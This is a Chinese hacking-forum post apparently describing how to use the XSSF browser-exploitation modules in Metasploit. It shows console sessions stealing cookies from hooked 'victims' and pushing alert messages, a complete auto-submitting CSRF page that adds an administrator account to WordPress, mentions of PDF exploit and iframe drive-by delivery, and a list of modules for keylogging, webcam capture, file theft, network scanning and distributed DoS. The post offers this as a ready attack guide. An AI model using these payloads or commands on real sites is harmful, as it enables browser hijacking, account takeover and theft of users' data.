切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
206 重写 xssf 2[复制链接]
发表于 2012-10-4 22:20:05 | 显示全部楼层 |!read_mode!
关于使用看老文章 :http://www.3g-sec.com/thread-279-1-1.html
获得COOKIES
  1. msf  auxiliary(steal_sdcard_file) > use auxiliary/xssf/public/misc/cookie
  2. msf  auxiliary(cookie) > exploit

  3. [*] Auxiliary module execution started, press [CTRL + C] to stop it !
  4. [*] Using URL: http://5.5.5.2:8080/wfMRaf3

  5. [+] Remaining victims to attack: [2 (1)]

  6. [+] Code 'auxiliary/xssf/public/misc/cookie' sent to victim '2'
  7. [+] Remaining victims to attack: NONE
  8. [+] Response received from victim '2' from module 'Cookie getter'
复制代码

弹窗
  1. msf  auxiliary(cookie) > use auxiliary/xssf/public/misc/alert
  2. msf  auxiliary(alert) > show options

  3. Module options (auxiliary/xssf/public/misc/alert):

  4.    Name          Current Setting  Required  Description
  5.    ----          ---------------  --------  -----------
  6.    AlertMessage  XSSF ALERT !     yes       Message you want to send to the victim.
  7.    SRVHOST       5.5.5.2          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  8.    SRVPORT       8080             yes       The local port to listen on.
  9.    SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
  10.    URIPATH                        no        The URI to use for this exploit (default is random)
  11.    VictimIDs     ALL              yes       IDs of the victims you want to receive the code.\nExamples : 1, 3-5 / ALL / NONE

  12. msf  auxiliary(alert) > set AlertMessage hacked by Helen
  13. AlertMessage => hacked by Helen
  14. msf  auxiliary(alert) > exploit

  15. [*] Auxiliary module execution started, press [CTRL + C] to stop it !
  16. [*] Using URL: http://5.5.5.2:8080/qTH1lORMHLNLfL

  17. [+] Remaining victims to attack: [3 (1)]

  18. [+] Code 'auxiliary/xssf/public/misc/alert' sent to victim '3'
  19. [+] Remaining victims to attack: NONE
复制代码

csrfmsf auxiliary(cookie) > use auxiliary/xssf/public/misc/csrf
参考:http://baike.baidu.com/view/1609487.htm
一个例子 WORDPRESS添加ADMIN
  1. <html>
  2. <body onload="javascript:document.forms[0].submit()">
  3. <H2>CSRF Exploit to add Administrator</H2>
  4. <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php">
  5. <input type="hidden" name="action" value="createuser"/>
  6. <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/>
  7. <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
  8. <input type="hidden" name="user_login" value="admin2"/>
  9. <input type="hidden" name="email" value="admin2@admin.com"/>
  10. <input type="hidden" name="first_name" value="admin2@admin.com"/>
  11. <input type="hidden" name="last_name" value=""/>
  12. <input type="hidden" name="url" value=""/>
  13. <input type="hidden" name="pass1" value="password"/>
  14. <input type="hidden" name="pass2" value="password"/>
  15. <input type="hidden" name="role" value="administrator"/>
  16. <input type="hidden" name="createuser" value="Add+New+User+"/>
  17. </form>
  18. </body>
  19. </html>
复制代码

PDF本地漏洞use auxiliary/xssf/public/misc/load_pdf
生成一个文件漏洞 PDF 写入运行
挂马use auxiliary/xssf/public/persistence/iframize
全部插件
use auxiliary/xssf/public/android/steal_sdcard_file
use auxiliary/xssf/public/chrome/filejacking
use auxiliary/xssf/public/ie/command
use auxiliary/xssf/public/iphone/skype_call
use auxiliary/xssf/public/misc/alert
use auxiliary/xssf/public/misc/change_interval
use auxiliary/xssf/public/misc/check_connected
use auxiliary/xssf/public/misc/cookie
use auxiliary/xssf/public/misc/csrf
use auxiliary/xssf/public/misc/detect_properties
use auxiliary/xssf/public/misc/get_page
use auxiliary/xssf/public/misc/load_applet
use auxiliary/xssf/public/misc/load_pdf
use auxiliary/xssf/public/misc/logkeys
use auxiliary/xssf/public/misc/prompt
use auxiliary/xssf/public/misc/redirect
use auxiliary/xssf/public/misc/save_page
use auxiliary/xssf/public/misc/tabnapping
use auxiliary/xssf/public/misc/visited_pages
–More–
use auxiliary/xssf/public/misc/webcam_capture
–More–
use auxiliary/xssf/public/misc/xss_get_bounce
–More–
use auxiliary/xssf/public/network/connection_speed
–More–
use auxiliary/xssf/public/network/distributed_dos
–More–
use auxiliary/xssf/public/network/ie/ipconfig
–More–
use auxiliary/xssf/public/network/ms_windows_html5/scan_network
–More–
use auxiliary/xssf/public/network/ms_windows_html5/scan_ports
–More–
use auxiliary/xssf/public/network/ping
–More–
use auxiliary/xssf/public/network/web_services
–More–
use auxiliary/xssf/public/old_browsers/bypass_sop_ie6
–More–
use auxiliary/xssf/public/old_browsers/trace_method_results
–More–
use auxiliary/xssf/public/persistence/ghostify
–More–
use auxiliary/xssf/public/persistence/iframize





附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 10:02

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部